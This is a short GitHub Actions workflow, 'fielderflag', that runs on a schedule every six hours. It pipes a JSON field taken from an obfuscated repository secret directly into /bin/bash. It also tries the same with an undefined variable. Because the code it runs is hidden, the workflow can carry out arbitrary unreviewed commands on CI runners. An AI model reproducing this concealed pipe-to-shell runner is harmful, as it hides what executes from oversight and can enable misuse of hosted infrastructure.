name: fielderflag
on:
  workflow_dispatch:
  schedule:
    - cron: '8 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fielderflag
        env:
          sb77: ${{ secrets.sb77 }}
        run: |
          echo $sb77 | jq -r .bi47894 | /bin/bash
          echo $p5 | jq -r .rv5 | /bin/bash

